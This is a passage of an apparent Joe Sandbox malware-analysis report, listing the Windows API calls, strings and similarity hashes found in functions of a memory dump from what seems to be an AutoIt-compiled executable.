                                                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00C75AC3
                                                                                      • GetWindowRect.USER32(?,?), ref: 00C75ACC
                                                                                      • _wcslen.LIBCMT ref: 00C75B33
                                                                                      • SetWindowTextW.USER32(?,?), ref: 00C75B6F
                                                                                      • GetDesktopWindow.USER32 ref: 00C75B75
                                                                                      • GetWindowRect.USER32(00000000), ref: 00C75B7C
                                                                                      • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00C75BD3
                                                                                      • GetClientRect.USER32(?,?), ref: 00C75BE0
                                                                                      • PostMessageW.USER32(?,00000005,00000000,?), ref: 00C75C05
                                                                                      • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00C75C2F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                      • String ID:
                                                                                      • API String ID: 895679908-0
                                                                                      • Opcode ID: 5081271993cbc065a35dc6ec66285121f8a6a0d1117831e3be27de50ae1670fa
                                                                                      • Instruction ID: 629b699b4e3e19c9c5b2598afc6c9c9c3cfd6a60f0df3b77c742de448ce3e4a7
                                                                                      • Opcode Fuzzy Hash: 5081271993cbc065a35dc6ec66285121f8a6a0d1117831e3be27de50ae1670fa
                                                                                      • Instruction Fuzzy Hash: 1B718131900B09AFDB20DFA9CE85BAEBBF5FF48704F104918E556A35A0D7B5EA44CB50
                                                                                      APIs
                                                                                      • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00C300C6
                                                                                        • Part of subcall function 00C300ED: InitializeCriticalSectionAndSpinCount.KERNEL32(00CE070C,00000FA0,CCCCC5E3,?,?,?,?,00C523B3,000000FF), ref: 00C3011C
                                                                                        • Part of subcall function 00C300ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00C523B3,000000FF), ref: 00C30127
                                                                                        • Part of subcall function 00C300ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00C523B3,000000FF), ref: 00C30138
                                                                                        • Part of subcall function 00C300ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00C3014E
                                                                                        • Part of subcall function 00C300ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00C3015C
                                                                                        • Part of subcall function 00C300ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00C3016A
                                                                                        • Part of subcall function 00C300ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00C30195
                                                                                        • Part of subcall function 00C300ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00C301A0
                                                                                      • ___scrt_fastfail.LIBCMT ref: 00C300E7
                                                                                        • Part of subcall function 00C300A3: __onexit.LIBCMT ref: 00C300A9
                                                                                      Strings
                                                                                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00C30122
                                                                                      • SleepConditionVariableCS, xrefs: 00C30154
                                                                                      • InitializeConditionVariable, xrefs: 00C30148
                                                                                      • kernel32.dll, xrefs: 00C30133
                                                                                      • WakeAllConditionVariable, xrefs: 00C30162
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                      • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                      • API String ID: 66158676-1714406822
                                                                                      • Opcode ID: deb592b73c740bcc8cad521f44a0488b0b979e3ab8237a63cee572e48e46b0a6
                                                                                      • Instruction ID: dc6ece1f8418497ab6f2270070478a26bf25bcb62cdbdf7eb51f258f83a26e2c
                                                                                      • Opcode Fuzzy Hash: deb592b73c740bcc8cad521f44a0488b0b979e3ab8237a63cee572e48e46b0a6
                                                                                      • Instruction Fuzzy Hash: C2213833A507116FE7216FE4AC96B2E33E4EB06B65F20013EF901E7691DFB09C008A90
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen
                                                                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                      • API String ID: 176396367-1603158881
                                                                                      • Opcode ID: 63ac9a01d1657a3ad7ca3453fe000aadcec2d504ba2169d874b1a502bfd9a511
                                                                                      • Instruction ID: 4fc390fe69ecf2fc44b4c771d03ba099afea422f4986e1818d7e50e6a679c811
                                                                                      • Opcode Fuzzy Hash: 63ac9a01d1657a3ad7ca3453fe000aadcec2d504ba2169d874b1a502bfd9a511
                                                                                      • Instruction Fuzzy Hash: 02E1F632A00556ABCB18DF78C8517EEBBB4BF44710F54C12AE46AB7240DB30AF85B790
                                                                                      APIs
                                                                                      • CharLowerBuffW.USER32(00000000,00000000,00CACC08), ref: 00C84527
                                                                                      • _wcslen.LIBCMT ref: 00C8453B
                                                                                      • _wcslen.LIBCMT ref: 00C84599
                                                                                      • _wcslen.LIBCMT ref: 00C845F4
                                                                                      • _wcslen.LIBCMT ref: 00C8463F
                                                                                      • _wcslen.LIBCMT ref: 00C846A7
                                                                                        • Part of subcall function 00C2F9F2: _wcslen.LIBCMT ref: 00C2F9FD
                                                                                      • GetDriveTypeW.KERNEL32(?,00CD6BF0,00000061), ref: 00C84743
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen$BuffCharDriveLowerType
                                                                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                      • API String ID: 2055661098-1000479233
                                                                                      • Opcode ID: ce964f07bc06ce735cef0cb9b9e3575a855dffca85bdf3eea13d8d3c2ec8b5bd
                                                                                      • Instruction ID: f6ab543bb81330903e82af0acdbcee9e7f7bde532b73e82030ea571f59842830
                                                                                      • Opcode Fuzzy Hash: ce964f07bc06ce735cef0cb9b9e3575a855dffca85bdf3eea13d8d3c2ec8b5bd
                                                                                      • Instruction Fuzzy Hash: F7B126716083039FC718EF28C890A6EB7E5BFA6728F50491DF4A6C7291E730D944DB96
                                                                                      APIs
                                                                                      • _wcslen.LIBCMT ref: 00C9B198
                                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00C9B1B0
                                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00C9B1D4
                                                                                      • _wcslen.LIBCMT ref: 00C9B200
                                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00C9B214
                                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00C9B236
                                                                                      • _wcslen.LIBCMT ref: 00C9B332
                                                                                        • Part of subcall function 00C805A7: GetStdHandle.KERNEL32(000000F6), ref: 00C805C6
                                                                                      • _wcslen.LIBCMT ref: 00C9B34B
                                                                                      • _wcslen.LIBCMT ref: 00C9B366
                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C9B3B6
                                                                                      • GetLastError.KERNEL32(00000000), ref: 00C9B407
                                                                                      • CloseHandle.KERNEL32(?), ref: 00C9B439
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00C9B44A
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00C9B45C
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00C9B46E
                                                                                      • CloseHandle.KERNEL32(?), ref: 00C9B4E3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                      • String ID:
                                                                                      • API String ID: 2178637699-0
                                                                                      • Opcode ID: b6dadc14eb5293a455aad2e506588566d0b3b477daf7ca665e2101a688ddf429
                                                                                      • Instruction ID: b5a8aa7ba803b0b4d8a8e503a6206523dae2da3d936dcf593ce183da7a799fde
                                                                                      • Opcode Fuzzy Hash: b6dadc14eb5293a455aad2e506588566d0b3b477daf7ca665e2101a688ddf429
                                                                                      • Instruction Fuzzy Hash: 73F1CC31608300AFCB14EF24D995B6EBBE1BF86314F14855DF8998B2A2DB30ED45DB52
                                                                                      APIs
                                                                                      • GetMenuItemCount.USER32(00CE1990), ref: 00C52F8D
                                                                                      • GetMenuItemCount.USER32(00CE1990), ref: 00C5303D
                                                                                      • GetCursorPos.USER32(?), ref: 00C53081
                                                                                      • SetForegroundWindow.USER32(00000000), ref: 00C5308A
                                                                                      • TrackPopupMenuEx.USER32(00CE1990,00000000,?,00000000,00000000,00000000), ref: 00C5309D
                                                                                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00C530A9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                      • String ID: 0
                                                                                      • API String ID: 36266755-4108050209
                                                                                      • Opcode ID: 0626926988ad1f1c1d2ea2b0d1821e137d7cf6f6c422979175946080b4506aa8
                                                                                      • Instruction ID: f8d78dd76491d8501dbe58242d26f9e13917a574817d6b82d396b8e455f29db4
                                                                                      • Opcode Fuzzy Hash: 0626926988ad1f1c1d2ea2b0d1821e137d7cf6f6c422979175946080b4506aa8
                                                                                      • Instruction Fuzzy Hash: F5716E34600255BEEB21DF64DC89F9EBFA4FF02368F204206F924661E1C7B1AE94E754
                                                                                      APIs
                                                                                      • DestroyWindow.USER32(?,?), ref: 00CA6DEB
                                                                                        • Part of subcall function 00C16B57: _wcslen.LIBCMT ref: 00C16B6A
                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00CA6E5F
                                                                                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00CA6E81
                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00CA6E94
                                                                                      • DestroyWindow.USER32(?), ref: 00CA6EB5
                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00C10000,00000000), ref: 00CA6EE4
                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00CA6EFD
                                                                                      • GetDesktopWindow.USER32 ref: 00CA6F16
                                                                                      • GetWindowRect.USER32(00000000), ref: 00CA6F1D
                                                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00CA6F35
                                                                                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00CA6F4D
                                                                                        • Part of subcall function 00C29944: GetWindowLongW.USER32(?,000000EB), ref: 00C29952
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                      • String ID: 0$tooltips_class32
                                                                                      • API String ID: 2429346358-3619404913
                                                                                      • Opcode ID: e5eb1bb84b3a6f2eb479b38a84bf083fac208f66559ab0e6697f179613b62cde
                                                                                      • Instruction ID: d86adaad1d91b6df57930090250a799a0e0131a6fd329c620001859ce7f620d9
                                                                                      • Opcode Fuzzy Hash: e5eb1bb84b3a6f2eb479b38a84bf083fac208f66559ab0e6697f179613b62cde
                                                                                      • Instruction Fuzzy Hash: 45715874144245AFDB21CF58DC84FAABBE9FB8A308F08051EF999872A1C771AA45DB11
                                                                                      APIs
                                                                                        • Part of subcall function 00C29BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00C29BB2
                                                                                      • DragQueryPoint.SHELL32(?,?), ref: 00CA9147
                                                                                        • Part of subcall function 00CA7674: ClientToScreen.USER32(?,?), ref: 00CA769A
                                                                                        • Part of subcall function 00CA7674: GetWindowRect.USER32(?,?), ref: 00CA7710
                                                                                        • Part of subcall function 00CA7674: PtInRect.USER32(?,?,00CA8B89), ref: 00CA7720
                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00CA91B0
                                                                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00CA91BB
                                                                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00CA91DE
                                                                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00CA9225
                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00CA923E
                                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00CA9255
                                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00CA9277
                                                                                      • DragFinish.SHELL32(?), ref: 00CA927E
                                                                                      • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00CA9371
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                      • API String ID: 221274066-3440237614
                                                                                      • Opcode ID: 34e97296038a74aa4b0374cf80aa4b6bcf7f6143ca3769f13683c5322902017a
                                                                                      • Instruction ID: f340fa3b9d9a7f562813b4643dafe99d0cdad8092e4324f0a27b49054e7c89a0
                                                                                      • Opcode Fuzzy Hash: 34e97296038a74aa4b0374cf80aa4b6bcf7f6143ca3769f13683c5322902017a
                                                                                      • Instruction Fuzzy Hash: 32617F71108301AFD701DF94DC95EAFBBE8EF8A754F00091EF595931A1DB309A45DB52
                                                                                      APIs
                                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C8C4B0
                                                                                      • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00C8C4C3
                                                                                      • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00C8C4D7
                                                                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00C8C4F0
                                                                                      • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00C8C533
                                                                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00C8C549
                                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C8C554
                                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00C8C584
                                                                                      • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00C8C5DC
                                                                                      • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00C8C5F0
                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00C8C5FB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                      • String ID:
                                                                                      APIs
                                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00CA8592
                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00CA85A2
                                                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00CA85AD
                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00CA85BA
                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00CA85C8
                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00CA85D7
                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00CA85E0
                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00CA85E7
                                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00CA85F8
                                                                                      • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,00CAFC38,?), ref: 00CA8611
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00CA8621
                                                                                      • GetObjectW.GDI32(?,00000018,?), ref: 00CA8641
                                                                                      • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00CA8671
                                                                                      • DeleteObject.GDI32(?), ref: 00CA8699
                                                                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00CA86AF
                                                                                      Similarity
                                                                                      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                      • String ID:
                                                                                      APIs
                                                                                      • VariantInit.OLEAUT32(00000000), ref: 00C81502
                                                                                      • VariantCopy.OLEAUT32(?,?), ref: 00C8150B
                                                                                      • VariantClear.OLEAUT32(?), ref: 00C81517
                                                                                      • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00C815FB
                                                                                      • VarR8FromDec.OLEAUT32(?,?), ref: 00C81657
                                                                                      • VariantInit.OLEAUT32(?), ref: 00C81708
                                                                                      • SysFreeString.OLEAUT32(?), ref: 00C8178C
                                                                                      • VariantClear.OLEAUT32(?), ref: 00C817D8
                                                                                      • VariantClear.OLEAUT32(?), ref: 00C817E7
                                                                                      • VariantInit.OLEAUT32(00000000), ref: 00C81823
                                                                                      Similarity
                                                                                      • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                                                      • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                      APIs
                                                                                        • Part of subcall function 00C19CB3: _wcslen.LIBCMT ref: 00C19CBD
                                                                                        • Part of subcall function 00C9C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C9B6AE,?,?), ref: 00C9C9B5
                                                                                        • Part of subcall function 00C9C998: _wcslen.LIBCMT ref: 00C9C9F1
                                                                                        • Part of subcall function 00C9C998: _wcslen.LIBCMT ref: 00C9CA68
                                                                                        • Part of subcall function 00C9C998: _wcslen.LIBCMT ref: 00C9CA9E
                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C9B6F4
                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C9B772
                                                                                      • RegDeleteValueW.ADVAPI32(?,?), ref: 00C9B80A
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00C9B87E
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00C9B89C
                                                                                      • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00C9B8F2
                                                                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00C9B904
                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00C9B922
                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00C9B983
                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00C9B994
                                                                                      Similarity
                                                                                      • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                      APIs
                                                                                      • GetDC.USER32(00000000), ref: 00C925D8
                                                                                      • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00C925E8
                                                                                      • CreateCompatibleDC.GDI32(?), ref: 00C925F4
                                                                                      • SelectObject.GDI32(00000000,?), ref: 00C92601
                                                                                      • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00C9266D
                                                                                      • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00C926AC
                                                                                      • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00C926D0
                                                                                      • SelectObject.GDI32(?,?), ref: 00C926D8
                                                                                      • DeleteObject.GDI32(?), ref: 00C926E1
                                                                                      • DeleteDC.GDI32(?), ref: 00C926E8
                                                                                      • ReleaseDC.USER32(00000000,?), ref: 00C926F3
                                                                                      Similarity
                                                                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                      • String ID: (
                                                                                      APIs
                                                                                      • ___free_lconv_mon.LIBCMT ref: 00C4DAA1
                                                                                        • Part of subcall function 00C4D63C: _free.LIBCMT ref: 00C4D659
                                                                                        • Part of subcall function 00C4D63C: _free.LIBCMT ref: 00C4D66B
                                                                                        • Part of subcall function 00C4D63C: _free.LIBCMT ref: 00C4D67D
                                                                                        • Part of subcall function 00C4D63C: _free.LIBCMT ref: 00C4D68F
                                                                                        • Part of subcall function 00C4D63C: _free.LIBCMT ref: 00C4D6A1
                                                                                        • Part of subcall function 00C4D63C: _free.LIBCMT ref: 00C4D6B3
                                                                                        • Part of subcall function 00C4D63C: _free.LIBCMT ref: 00C4D6C5
                                                                                        • Part of subcall function 00C4D63C: _free.LIBCMT ref: 00C4D6D7
                                                                                        • Part of subcall function 00C4D63C: _free.LIBCMT ref: 00C4D6E9
                                                                                        • Part of subcall function 00C4D63C: _free.LIBCMT ref: 00C4D6FB
                                                                                        • Part of subcall function 00C4D63C: _free.LIBCMT ref: 00C4D70D
                                                                                        • Part of subcall function 00C4D63C: _free.LIBCMT ref: 00C4D71F
                                                                                        • Part of subcall function 00C4D63C: _free.LIBCMT ref: 00C4D731
                                                                                      • _free.LIBCMT ref: 00C4DA96
                                                                                        • Part of subcall function 00C429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00C4D7D1,00000000,00000000,00000000,00000000,?,00C4D7F8,00000000,00000007,00000000,?,00C4DBF5,00000000), ref: 00C429DE
                                                                                        • Part of subcall function 00C429C8: GetLastError.KERNEL32(00000000,?,00C4D7D1,00000000,00000000,00000000,00000000,?,00C4D7F8,00000000,00000007,00000000,?,00C4DBF5,00000000,00000000), ref: 00C429F0
                                                                                      • _free.LIBCMT ref: 00C4DAB8
                                                                                      • _free.LIBCMT ref: 00C4DACD
                                                                                      • _free.LIBCMT ref: 00C4DAD8
                                                                                      • _free.LIBCMT ref: 00C4DAFA
                                                                                      • _free.LIBCMT ref: 00C4DB0D
                                                                                      • _free.LIBCMT ref: 00C4DB1B
                                                                                      • _free.LIBCMT ref: 00C4DB26
                                                                                      • _free.LIBCMT ref: 00C4DB5E
                                                                                      • _free.LIBCMT ref: 00C4DB65
                                                                                      • _free.LIBCMT ref: 00C4DB82
                                                                                      • _free.LIBCMT ref: 00C4DB9A
                                                                                      Similarity
                                                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                      • String ID:
                                                                                      APIs
